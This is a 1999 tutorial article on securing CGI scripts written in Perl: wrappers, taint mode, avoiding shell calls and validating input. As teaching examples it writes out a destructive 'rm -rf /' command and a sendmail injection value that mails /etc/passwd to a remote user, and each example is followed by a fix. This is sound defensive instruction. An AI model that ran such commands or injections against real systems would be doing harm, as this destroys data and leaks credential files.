Related items

CGI Security : Better Safe than Sorry

You are here: irt.org | Articles | CGI & Perl | CGI Security : Better Safe than Sorry [ previous next ]

Published on: Sunday 19th September 1999 By: Pankaj Kamthan

Introduction
- CGI Security Breach : Origins And Consequences
Server-Side Configuration for CGI Scripts
THE Language of Choice : Compiled Vs. Interpreted
- Embedded Interpreters in Apache and CGI Scripts
HTML Forms and the CGI Script
Information (Over)exposure
Exposing External Data to the Shell
- Tainting
Backtick Quotes
Calling Shell Commands eval(),exec(),system()
Path Environment Variable to Resolve Partial Path Names to Locate External Programs
General Considerations
Pre-Built CGI Scripts : There is no Free Lunch
Conclusion
Acknowledgements
References
Appendix : A Summary of Perl Regular Expressions

Introduction

CGI is the first and remains one of the most widely-used means of extending Web servers by interfacing external applications, offering various advantages.

However, the power of CGI comes with a price. CGI interfaces can completely compromise a Web server's security, and thus of the host on which it is running. All benefits of a CGI script are neutralized if it is insecure. It is impossible to anticipate (and defend) against all security holes. But by following a few guidelines, you can avoid known security holes and unsafe practices.

In dealing with the CGI security issues, our focus will be the following questions:

What type of potential CGI security problems exist? How do they arise? What can be the consequences of these problems? How, and to what extent, can these problems be eliminated?

For the sake of this article, we will restrict ourselves to UNIX-type environments, although many ideas presented here carry over to other systems. When referring to a programming language, we will refer to Perl exclusively as it has established itself as the language of choice for CGI programming. Also, even though the CGI is independent of any server, we will incline our discussion towards Apache, the most popular Web server in use today.

CGI Security Breach : Origins and Consequences

The first step towards tackling the CGI security issues requires finding the origins of the problems. This in turn requires identification of all the different components involved in the entire CGI communication process. (Note that not all of these are involved in all cases.) They are:

The User. A person including an intruder (such as a hacker, masquerader, counterfeiter, an eavesdropper) or a program (such as a virus).
HTML form or searchable index.
HTTP and CGI protocols.
The CGI script.
Compiler/interpreter that runs the CGI script (which depends on the language the script is written in).
External data (that comes from the user in 1. above).
External programs that the script calls.
Client-side techniques, such as JavaScript, used in conjunction with the CGI.
The Web browser.
The Web server.

Figure 1 presents a schematic of the CGI communication between the Web client and server.

Here are some remarks on the effect of the above components. The main sources of CGI security problems are 2, 4, 6, 7 and 10, which result in insecure data, insecure code, or insecure server. 6 can pose a major security problem when it comes in contact with 7. It is possible that 3, 5 or 7 themselves could lead to security problems. Discussion of that is beyond the scope of this article. 8 and 9 are client-side technologies and don't really have a direct relationship with the CGI security issue. 8, however, can affect 6.

This article is primarily targeted towards developers who write CGI scripts; however, we have also provided a section for those who use pre-built CGI scripts for their purposes.

CGI Communication

Figure 1. CGI Communication between the Web Client and Server.

CGI scripts can present security holes in two ways:

They may intentionally or unintentionally leak information about the host system that can result in a break in.
Scripts that process remote user input, such as the contents of a form or a "searchable index" command, may be vulnerable to attacks in which the remote user tricks them into executing commands.

Security holes present in CGI scripts on Web sites can be exploited for various frivolous purposes, including the following:

Critical files, particularly those which contain sensitive information (such as passwords), are stolen, modified or erased by unauthorized users.
Content is sold to a competitor.
Information about the host machine is obtained which will allow unauthorized users to have access to the system.
Commands are executed on the server host machine, allowing unauthorized users to modify the system.
The site is used to launch attacks against other sites.

Server-Side Configuration for CGI Scripts

Server Configuration for CGI Scripts

CGI scripts reside within the Web server-accessible directory. Any lapses in the server configuration can lead to CGI security problems. Therefore, knowing appropriate server configurations can be helpful:

Dynamically produced indexes make an entire directory's content visible to the user. These could lead to private files such as .htaccess files being accessible without the author's knowledge. You should therefore configure the server to not generate dynamically produced indexes.
It is much easier to keep track of what CGI scripts are installed on the system if they are kept in a central location (like in the cgi-bin directory) rather than being scattered around among multiple directories. A cgi-bin directory with controlled access lessens dangerous possibilities such as someone managing to create a CGI file somewhere in your document tree and then executing it remotely by requesting its URL.
You should configure the server to not serve any document other than a *.cgi document from within a cgi-bin directory tree. Interpreters, shells, scripting engines, and other extensible programs should also never appear in a cgi-bin directory, nor should they be located elsewhere on a computer where they might be invoked by a request to a Web server process. You should also be careful not to leave any backup copies (such as filename.cgi.bak, filename.cgi~) of the script generated by certain editors.

Moral: Fix a single directory, such as cgi-bin, for serving CGI scripts only, and abide by it.

CGI Script Privileges

007 Can not be Trusted

You should make sure that the CGI scripts have only the required permissions for the task they perform. In UNIX, you can set that by the chmod command. For example, search scripts (and various other which do not let others write to the server) usually run under the mode "755."

"NOBODY" can be a Threat to Everybody

Even if the server is run as "nobody," CGI scripts are potential security holes. A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, or even launch a log-in session on a high numbered port. Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.

CGI Scripts with Extra Privileges

There are cases where some scripts need to grant some extra privileges to their users, without giving away other privileges that they didn't intent to give away. These scripts need to run with permissions different from those of the Web server itself (usually user "nobody"). On UNIX, one way to do that is to make the CGI script suid. By doing that, the script runs with the permissions of the owner of the file, rather than the Web server itself and lets a CGI script to access resources that it otherwise could not.

In Perl, it can be done as follows:

Create a special UNIX user for that application. Have your scripts suid to the user by setting its "s" bit. For example:
```
chmod u+s foo.cgi
```
Use Perl's emulation mode for handling suid scripts safely.
Use chroot() function for restricting the script to a particular directory. (The chroot() call restricts the root directory of a process to a specified directory within a file system.)

Running a script as suid can, however, be dangerous. The need for a script to run as suid should be carefully examined. This represents a major risk insofar as giving your script more privileges than the "nobody" user has. Weaknesses in setuid scripts can let a malicious user access not only files that the low-privilege Web server user can access, but also any that could be accessed by the user the script runs as. (That is why the scripts should be run as the lowest possible privilege.) It also increases the potential for damage that a subverted script can cause. Many UNIX systems contain a hole that allows suid scripts to be subverted. This hole affects only scripts, not compiled programs. On such systems, an attempt to execute a Perl script with the suid bits set will result in an error message from Perl itself. One way to avoid that is to run the server itself as a user that has sufficient privileges to do whatever the scripts need to do.

Moral: Make sure that CGI script permissions are set correctly. Unless absolutely necessary, do not run a script under "suid." Avoid "setuid root." In any case, use a CGI wrapper, if possible.

CGI Wrappers

CGI scripts can be made safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the UNIX chroot() mechanism to place the script inside a restricted part of the file system.

There are three major wrappers available for UNIX systems that we discuss here:

CGIWrap

CGIwrap is a gateway program that puts a wrapper around CGI scripts and thus allows general users to use CGI scripts without compromising the security of the Web server. Scripts are run with the permissions (for example, "nobody") of the user who owns the script. In addition, several security checks are performed on the script, which will not be executed if any check fails. A policy can be enforced so that users must use CGIwrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.

There are certain caveats of deploying CGIWrap. Since CGI scripts run under the server's user ID, it is difficult under these circumstances for administrators to determine, for example, whose script is generating bounced mail, or introducing errors in the server log. There are also security implications when all users' scripts run with the same permissions: one user's script can unintentionally (or intentionally) trash the database maintained by another user's script. CGIWrap also increases the risk to the individual user; a subverted CGI script can trash the user's home directory by executing the command:

/bin/rm -rf /

Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.

SBOX

sbox, like CGIWrap, can run CGI scripts as the author's user ID. However, it takes additional steps to prevent CGI scripts from causing damage. It optionally performs a chroot to a restricted directory, isolating the script from the user's home directory. It can also set resource allocation limitations on CGI scripts which prevents certain denial-of-service attacks.

suEXEC

The Apache Web server comes with its own wrapper script called suEXEC. suEXEC provides the same functionality as CGIWrap, but, in addition, you can (using the User and Group directives in the <VirtualHost> section of the configuration file httpd.conf) have scripts run with the permissions of that user and group.

Normally, when a CGI or Server-Side Includes (SSI) script executes, it runs as the same user who is running the Web server. The suEXEC feature provides Apache users with the ability to run CGI (and SSI) scripts under user IDs different from the user ID of the calling Web server. When an HTTP request is made for a CGI (or SSI) script, Apache provides the suEXEC wrapper with the script's name and the user and group IDs under which the program is to execute. The wrapper then performs a series of tests to determine success or failure of the request. If any one of the tests fails, the program logs the failure and exits with an error.

Using suEXEC requires managing setuid root programs and the security issues they present. Used properly, this feature can reduce considerably the security risks involved with allowing users to develop and run private CGI (or SSI) scripts. However, if suEXEC is improperly configured, it can cause any number of problems and possibly create new security holes in your system.

>Moral: CGI wrappers are useful but they are not magic bullets. If you use them, make sure you are aware of their features (and limitations). Specifically, use suEXEC only if you have the requisite background to do so.

The Language of Choice for CGI Scripts : Compiled Vs. Interpreted

CGI scripts are written using a programming language, and the language of choice plays a key role in the security issues around them:

Interpreted languages such as Perl are used for various reasons for writing CGI scripts. However, they contain a potential security hole: the ability of the interpreter to pass arbitrary strings to a command shell for execution or to execute strings containing arbitrary statements. Compiled languages such as C are relatively safer in this respect as it requires more effort to spawn a shell. Shell scripting languages make it extremely easy to send data to system commands and capture their output. It is very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are therefore poor choices for anything but trivial CGI scripts.
A remote user's access to the script's source code is another issue. Unlike a compiled language like C, with an interpreted script, the source code is always potentially available which makes it more likely that bugs in it can be exploited. Even though a properly-configured server will not return the source code of an executable script, there are many scenarios in which this can be bypassed.
Due to the size and complexity, compiled code may be safer than interpreted code. Large programs, such as shell and Perl scripts, are more likely to contain bugs. Some of these bugs may be security holes.

All this being said, there is no guarantee that a compiled program will be safe. Interpreted languages such as Perl contain a number of built-in features (for example, the tainting mechanism) that were designed to catch potential security holes, and may make Perl scripts safer in some respects than the equivalent C program.

Embedded Interpreters in Apache and CGI Scripts

Apache can be extended by embedding language interpreters. For example, mod_perl is an Apache module which embeds the Perl language interpreter into it. This opens up an entire host of new applications which have previously been nonexistent. Often, CGI/Perl scripts tend to suffer from performance problems; with the use of mod_perl, one can have significant performance gain when running such scripts under Apache. These CGI scripts can now also access Apache internals.

Since mod_perl runs within an Apache httpd child process, it runs with the user/group ID specified in the httpd.conf file. Therefore, there are a few security considerations that you should be aware of:

The user/group should have the lowest possible privileges.
mod_perl should only have access to world readable files.
Different mod_perl scripts run successively using the same Perl interpreter instance. So, a malicious mod_perl script can redefine any Perl object and change the behaviour of other mod_perl scripts.
Enabling Perl's tainting mechanism helps you to filter data external to the script. Note that setting the -T switch on the first line of the script is not sufficient to enable tainting checks under mod_perl. You have to include the directive PerlTaintCheck On in the httpd.conf file.
If your script needs extra privileges, you will have to start a new process that runs under a suitable user/group ID. If all requests handled by the script will need extra privileges, you should write it as a suid CGI script and run it with the suEXEC wrapper. Alternatively, you can pre-process the request with mod_perl and fork a suid helper process to handle only the privileged part of the task.

HTML Forms and the Script

Sanity Checks

You should perform sanity checks, such as, all HTML form elements should return values.

Script Invocation

Although you can restrict access to a script to certain IP addresses (using, for example, <Limit>...</Limit> directives in the Apache configuration file access.conf) or to user name/password combinations (using, for example, Basic authentication in Apache), you can not control how the script is invoked. A script can be invoked from any form, anywhere in the world and even by directly requesting its URL. Referer gateways are good examples of such a case. When restricting access to a script, restrictions should be placed on the script as well as any HTML forms that access it. This is obviously the case when the script itself (dynamically) generates the requisite HTML document (containing the forms). In other cases, you can use the CGI environment variable HTTP_REFERER, which provides the URL of the document that the browser points to before accessing the CGI script, to restrict access.

Hidden Variables

Hidden variables should not be relied upon for security. This is because the hidden variables are in fact visible in the HTML that the server sends to the browser; all a user has to do is view the source of the document. After that, the user can set the hidden variables to his/her desire and send it back to the script. An example of a script using hidden variables (for state persistence) is the shopping cart script in the article E-Store on the Web : Let's Go Shopping!

CGI Scripts Calling External Programs

In Perl, you can invoke external programs in many different ways: you can capture the output of an external program using backtick quotes; you can open up a pipe to a program; you can invoke an external program and wait for it to return with system(); you can invoke an external program (and never return) with exec(). All of these constructions can be risky if they involve user input that may contain shell metacharacters. You should therefore try to find ways not to open a shell. It is safer to call an external program directly than going through a shell. However, this approach, though safe, essentially precludes programs that need to access external programs.

Information (Over)exposure

There are scripts that leak system information. For example, CGI gateways to the UNIX finger command often prints out the physical path to the fingered user's home directory, the w command gives information about what programs local users are using, and the ps command gives out valuable information on daemons running on the system.

Moral: Avoid giving out too much information about your site and server host.

Backtick Quotes

Backtick quotes (`...`), available in Perl (and shell interpreters) for capturing the output of programs as text strings, are dangerous. For example

print `/path_to/finger $input ('user_input')`;

expects the user input to be somebody's username. However, that may not always be the case.

Moral: Avoid backticks in CGI scripts.

Calling Shell Commands eval(), exec(), system()

It is very important that you understand what damage these calls can do. In some cases, you can avoid passing user-supplied variables through the shell by calling external programs differently.

For example, here is a Perl script that tries to send mail to an address indicated in a fill-out form:

$mail_to = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail $mail_to");
print MAIL "To: $mail_to\nFrom: somebody\n\n Hello\n";
close MAIL;

The problem is in the piped open() call. The script author assumed that the contents of the $mail_to variable will always be just an e-mail address. However, this may not be the case. If the following is entered:

nobody@nowhere;mail somebody@somewhere</etc/passwd;

the open() statement will evaluate the following command:

/path_to/sendmail nobody@nowhere; mail somebody@somewhere</etc/passwd

Unintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.

This situation can be avoided. sendmail supports a -t flag, which tells it to ignore the address given on the command line and take its To: address from the e-mail header. There is also the -oi flag to prevent sendmail from ending the message prematurely if it encounters a period at the start of a line. The example above can be rewritten in order to take advantage of these features:

$mailto = &get_input; # read the address from form
open (MAIL,"| /path_to/sendmail -t -oi");
print MAIL <<END;
To: $mailto
From: somebody(somebody\@somewhere)
Subject: something
...
END
close MAIL;

In Perl, (by using Perl's implementation of system() and exec() functions) you can pass arguments directly to external programs rather than going through the shell. For system() and exec(), if you pass the arguments to the external program, not in one long string, but as separate members in a list, then Perl will not go through the shell and shell metacharacters will have no undesired side effects. For example, instead of:

system "/path_to/sort < foo.in";

by doing this:

system "/path_to/sort","foo.in";

This feature can also be used to open a pipe without going through a shell. By calling open on the character sequence |-, you fork a copy of Perl and open a pipe to that copy. The child copy can then "exec" another program using the argument list variant of exec().

my $result =  open (SORT,"|-");
die "Couldn't open pipe to subprocess" unless defined($result);
  exec "/path_to/sort",$user_variable or die "Couldn't exec sort"
    if $result == 0;
  for my $line (@lines) {
    print SORT $line,"\n";
}
close SORT;

The initial call to open() tries to fork a copy of Perl. If the call fails it returns an undefined value and the script immediately dies, else the result will return zero to the child process, and the child's process ID to the parent. The child process checks the result value, and immediately attempts to "exec" the sort program. If anything fails at this point, the child quits. The parent process can then print to the SORT filehandle in the usual manner. To read from a pipe without opening up a shell, you can do something similar with the sequence -|:

$result = open(EGREP,"-|");
die "Couldn't open pipe to subprocess" unless defined($result);
exec "/path_to/egrep",'-efi',$user_pattern,$filename
  or die "Couldn't exec grep" if $result == 0;
  while (<EGREP>) {
  print "match: $_";
}
close EGREP;

Moral: Wherever possible, avoid opening shell. If you do so, check return conditions from all system calls.

Exposing External Data to the Shell

An example of exposing data to shell, which is a potential security threat is:

system ("/path_to/finger $user_input");

The problem is that any shell metacharacters can be passed through it. The list of shell metacharacters is extensive:

&;`'\"|*?~<>^()[]{}$\n\r

In case you have to open a shell, you should always scan the arguments for shell metacharacters and remove them. The best way is to check incoming data for the exact pattern that is desired. The Perl regular expressions that can be used for this purpose are given in the Appendix.

For example, one way to assure that the $mail_to address created by the user really does look like a valid address is:

$mail_to = &get_name_from_input;
unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+$/) {
  die 'The address is not in form einstein@irt.org';
}

Moral: Never pass unchecked remote user input to a shell command. Match legal characters rather than filtering out disallowed ones (which is much more difficult to guess).

Tainting

One of the most frequent security problems in CGI scripts is inadvertently passing unchecked user-supplied variables or "tainted variables" to the shell. Tainted variables are those that contain data that originate from outside the script, including data read from environment variables, from command line array, or from standard input. Perl provides a "taint checking" mechanism that prevents you from doing this. This feature checks for tainted variables and refuses to pass them to subshells to eval(). In Perl 5, the Perl "taint mode" can be enabled by placing the "-T" option at the beginning of the Perl script:

#!/usr/local/bin/perl -T

(Perl 4 does not support the -T flag. Instead, Perl 4 distributions typically come with a separate executable called taintPerl.)

The tainting mechanism has the following characteristics:

When enabled, tainting marks all variables that are supplied by users as "tainted." Any variable that is set using data external to the program (including data from the environment, from standard input, and from the command line) is considered tainted and cannot be used to affect anything else outside the program.
Tainted variables cannot be used in system(), exec(), piped open(), eval(), backtick command, or any function that affects something outside the program. If you try to do so, Perl exits with a warning message. Perl will also exit if you attempt to call an external program without explicitly setting the PATH environment variable. If you are trying to do something insecure, you get a fatal error saying something like "Insecure Dependency" or "Insecure $ENV(PATH)."
Untainted information can only be extracted from a tainted variable by the use of Perl's string matching operations. The only way to untaint a tainted variable is by performing a pattern matching operation on it and extracting the matched substrings. For example, if you expect a variable to contain an e-mail address, you can extract an untainted copy of the address in this way:
```
$mail_address=~/(\S+)\@([\w.-]+)/;
$untainted_address = "$1\@$2";
```
This pattern match accepts e-mail addresses of the form "somebody@somewhere" where "somewhere" looks like a domain name, and "somebody" consists of one or more non-whitespace characters. Note that this regular expression will not remove shell metacharacters from the e-mail address. This is because it is valid for e-mail addresses to contain such characters. Just because you have untainted a variable doesn't mean that it is now safe to pass it to a shell; the taint checks help you to recognize when a variable is potentially dangerous.
Tainting can propagate; variables whose values are dependent on tainted variables are themselves tainted as well. If you use a tainted variable to set the value of another variable, the second variable also becomes tainted.
The tainting feature also requires that you set the PATH environment variable to invoke the system() call. Even if you don't rely on the path when you invoke an external program, there's a chance that the invoked program might. Therefore, you need to set it yourself at the beginning of your CGI script whenever you use taint checks, as the following example shows:
```
$ENV{'PATH'} = '/bin:/usr/bin:/usr/local/bin';
```
The above path should be adjusted according to the list of directories you want searched. It is not a good idea to include the current directory (".") in the path.
Perl ignores tainting for file names that are opened for reading only. Make sure that you untaint all file names, not just the ones used for writing.

See the CGI/Perl Taint Mode FAQ for more details on the tainting mechanism in CGI/Perl scripts.

Moral: Use Perl's tainting features for all CGI scripts written in Perl.

Path Environment Variable to Resolve Partial Path Names to Locate External Programs

The PATH environment variable can be altered so that it points to the program the user wants your script to execute rather than the program you are expecting. You should invoke the programs using their full absolute pathnames instead. If you must rely on the PATH, set it yourself at the beginning of your CGI script. In general, it is not a good idea to put the current directory (".") into the path.

Moral: When using the PATH environment variable to invoke external programs, use absolute pathnames.

General Considerations

There are some general design considerations that can be followed to avoid CGI security problems:

CGI Security Policy. As mentioned in Chapter 13 of the book Web Security and Commerce, security is defined by policy. According to The World Wide Web Security FAQ, "... the single most important step you can take to increase your site's security is to create a written security policy." The same idea can be applied to the case of CGI security. The security policy should succinctly lay out your organization's policies with regard to different practices, which include:
- Directory on the server being used for CGI scripts.
- Programs being used to generate user passwords.
- Steps to be taken in the event of a break-in, including the contact person(s).
Race Condition. A race condition is a situation where between your two actions, an attacker can race in and change something to make the script to behave inappropriately. For example, there can be a race between testing whether a file exists and opening it for writing. Moral: Beware of race conditions. Always set your script's environment variable.
Error Checking. Use "-w" and "use strict." Moral: Use Perl's error checking features for all CGI scripts.
Informaton is Power. Keep abreast of security announcements, bug fixes and patches. For example, you can subscribe to CERT or CIAC mailing lists. Subscription to the Usenet newsgroup comp.infosystems.www.cgi and the ones in the comp.security.* hierarchy, can also be useful.
Only the Truth, and Nothing but the Truth. The scripts themselves should be designed and inspected to ensure that they perform only the desired task. The scripts should be run in a restricted environment. If these scripts are subverted to perform something unexpected, the damage they do will be limited.
Small is Beautiful. Make critical parts of the script as small and as simple as possible.
Test, Test, Test! Test the script thoroughly before using them on the Web server. Try to sabotage the script in any and all ways that you can think of. If you can, probably somebody else can too.
Pass the word, Not! It is a general practice (independent of any Web technology) that "good" passwords should be used. Good passwords are those that are a combination of alphanumeric characters which do not have any correlation to the user's personal information and can not be found in dictionaries.
When things go wrong. Prevention is better than cure but then security is about being prepared for the worst scenario. You should make regular backups and keep the backup device itself in (at least) a physically safe location.
The Devil is in the Details. You should log your scripts' actions by creating and checking your log files regularly. Report any error to a dedicated log file (separate from a server log file). If you are deploying Apache as the Web server, you can use the CGI::Carp module for error handling. To trap all/most Perl run-time errors and send the output to the client instead of Apache's error log, add this line to your script:
```
use CGI::Carp qw(fatalsToBrowser);
```
Round and round we (shouldn't) go. A bug in the script can put it into an infinite loop. Set (reasonable) time-outs on the real time used by the script while it is running and set (reasonable) time limits on the CPU time used by the script while it is running.
Design is the Key. Design the script carefully before you start actual coding. List all errors that might occur, environment in which the script will run, and the I/O behaviour. Have the CGI scripts check all the arguments provided by the user. Check arguments passed to operating system functions, check return conditions from system calls, check the length of every argument and filter them. Use full pathnames for any filename arguments, for both commands and data files. Do not create files in a world-writable directories.

Pre-Built CGI Scripts : There is no Free Lunch

Software reuse is a popular trend in the programming world: "avoid reinventing the wheel wherever you can." However, this practice comes with a price when programs are used as "black-boxes."

As an example, pre-built CGI scripts may contain security bugs unknown to their users. Therefore, if used at all, pre-built CGI scripts should be used with caution and various questions should be asked (and answered to a satisfactory extent) prior to their use. Here is a checklist:

How complex is the script? The longer is the script, the more likely it is to have problems.
Does the script read and/or write files on the host system? Programs that read files may inadvertently violate access restrictions, or pass sensitive system information to unauthorized users. Programs that write files have the potential to modify documents, or, in the worst case, introduce trojan horses in your system.
Does the script interact with external programs on your system? If yes, does it do so in a safe manner? For example, does the script use explicit path names when invoking these programs (instead of using the PATH environment variable to resolve partial path names)?
Does the script run with suid privileges? This is usually not considered safe.
Does the script validate user input from forms? Undesired user input is one of the primary causes of CGI security breach.

For a detailed account on this issue, see the article Security Issues When Installing and Customizing Pre-Built Web Scripts.

Moral: Use pre-built CGI scripts with caution and perform security checks before using them. If these scripts are in Perl, you should enable the Perl-specific security mechanisms. Visit regularly the sites which distribute them for updates/patches.

Conclusion

CGI Ahead : Script with Caution

Computer security is a give and take situation. There is no perfectly secure system. Thus, security is more about acceptable risk and emergency recovery than impregnability. That being said, all possible CGI security problems (and hence solutions) can not be identified apriori. The practices described here reduce the risk of security breaches but don't eliminate it. Also, even if the script seems safe, there is always the possibility that the external programs it uses may themselves be vulnerable.

Acknowledgements

Many of the examples introduced in the section CGI Scripts Calling External Programs are adapted from the The World Wide Web Security FAQ, and their use is hereby acknowledged.

References

W3C Security Resources.
CGI Programming on the World Wide Web, By Shishir Gundavaram, O'Reilly & Associates,1996. Appendix A: Perl CGI Programming FAQ. (Also available as Perl CGI Programming FAQ, Maintained by Tom Christiansen and Shishir Gundavaram.)
Programming Perl, By Larry Wall, Tom Christiansen & Randal L. Schwartz, O'Reilly & Associates, 1996. Chapter 6: Social Engineering.
Perl Cookbook, By Tom Christiansen & Nathan Torkington, O'Reilly & Associates, 1998. Chapter 19: CGI Programming.
perlsec - Perl docmentation on Perl security.
Web Security and Commerce, Simson Garfinkel & Gene Spafford, O'Reilly & Associates, 1996. Chapter 6: Secure CGI/API Programming.
Pre-Built CGI Scripts - Security Issues When Installing and Customizing Pre-Built Web Scripts, Selena Sol, WDVL.com.
CGI Wrappers - CGIWrap, sbox.
The CGI Security FAQ, Maintained by Paul Phillips. This document contains a useful guidelines, but has not been updated since September 1995.
CGI (Server) Scripts and Safe Scripting in Perl in the The World Wide Web Security FAQ, Maintained by Lincoln Stein.
CGI/Perl Taint Mode FAQ, Maintained by Gunther Birznieks.

Appendix : A Summary of Perl Regular Expressions

EXPRESSION	FUNCTION
`/abc/`	Matches abc anywhere within the string
`/^abc/`	Matches abc at the beginning of the string
`/abc$/`	Matches abc at the end of the string
`/a\|b/`	Matches either a or b
`/ab{m,n}c/`	Matches an a followed by m-n b's, followed by c, where m,n are nonnegative integers, m>n. If the second number is omitted, such as /ab {m,}c/, the expression will match m or more b's.
`/ab*c/`	Matches an a followed by zero or more b's, followed by c.
`/ab+c/`	Matches an a followed by one or more b's followed by c.
`/ab?c/`	Matches an a followed by an optional b followed by c. In Perl 5, the expression: /ab*?c/matches an a followed by as few b's as possible.
`/./`	Matches any single character except a newline (\n) /a..d / matches a a followed by any two characters, followed by d.
`/[abc]/`	Matches any one of a or b or c. A pattern of /[abc]+/ matches strings such as abcab, acbc, abbac, and so on.
`/\d/`	Matches a digit. Multipliers can be used. (/\d+/ matches one or more digits.)
`/\w/`	Matches a character classified as a word.
`/\s/`	Matches a character classified as whitespace.
`/\b/`	Matches a word boundary or a backspace. /cde\b/ matches cde, but not cdef. However, \b matches a backspace character inside a class. that is, [\b].
`/[^abc]/`	Matches a character that is not in the class. /[^abc ]+/ will match a string such as defg.
`/\D/`	Matches a character that is not a digit.
`/\W/`	Matches a character that is not a word.
`/\S/`	Matches a character that is not whitespace.
`/\B/`	Requires that there is no word boundary. /perl\B/ matches perl, but not perl script.
`/\*/`	Matches the * character. Use the \ character to escape characters that have significance in a regular expression.
`/(abc)/`	Matches abc anywhere within the string, but the parentheses act as memory, storing abc in the variable $1.
`/abc/i`	Ignores case. Matches either abc, Abc, ABc, and so on.

Related items

Creating a Page Counter In Perl

Speed Thrills : CGI Please ... and Fast!

CGI Programming Made (Relatively) Easy Using Libraries

Server-Side Includes and its Extensions

Random and Recursive Crypting using Salt on Unix and Win32

Timestamping an HTML Document

Deleting Files in Perl

Creating a mailing list using Perl

Reading and Writing to Files on the Server

Server Side Includes and CGI Security

Feedback on 'CGI Security : Better Safe than Sorry'

Thursday June 28th, 2001 at 10:14:03 - Neil Fraser